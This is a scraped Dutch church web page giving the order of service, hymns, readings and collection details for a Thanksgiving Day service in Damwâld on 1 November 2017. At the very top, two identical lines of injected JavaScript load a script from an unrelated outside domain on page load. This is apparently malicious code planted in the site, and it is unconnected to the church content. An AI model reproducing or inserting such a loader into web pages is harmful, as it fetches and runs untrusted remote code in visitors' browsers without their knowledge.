;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dankdag - PKN Damwâld
woensdag 1 november 2017
19:30 uur

Dankdag

Informatie

Voorganger:Da. J. Paans-Spoelstra, Burgum
Organist:Jaap van der Horn
Liturgie
Lied voor de dienst Gez. 393:1,4
Welkom en mededelingen
intochtslied Psalm 66:1,3
Stilgebed, Bemoediging en Groet
We zingen: Psalm 66:6,7
Gebed
We zingen: Gez. 350
We lezen: Psalm 65
We zingen: Psalm 65:1,5
We lezen: Kolossenzen 3:12-17
We zingen: Gez.488b:1,3,5
Verkondiging
We zingen: Elb 170
We zingen: Elb 274
Dank- en voorbeden
Collecte
We zingen: Gez. 44
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Dankdag - Dorcas voedselactie 2017

Dorcas voedselactie 2017
Dit jaar organiseert Dorcas voor de tweeëntwintigste keer de Dorcas Voedselactie: een actieweek waarin duizenden mensen zich vrijwillig inzetten voor voedsel en voedselzekerheid voor de allerarmsten in Oost-Europa en Afrika. De Dorcas Voedselactie vindt plaats rondom de Dankdag voor gewas en arbeid. Dorcas ziet Dankdag als een uitgelezen moment om stil te staan bij onze niet vanzelfsprekende welvaart en om onze dankbaarheid te tonen door om te zien naar de allerarmsten in de wereld. Dit staat ook in missietekst van Dorcas, Mattheüs 25:31-46.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds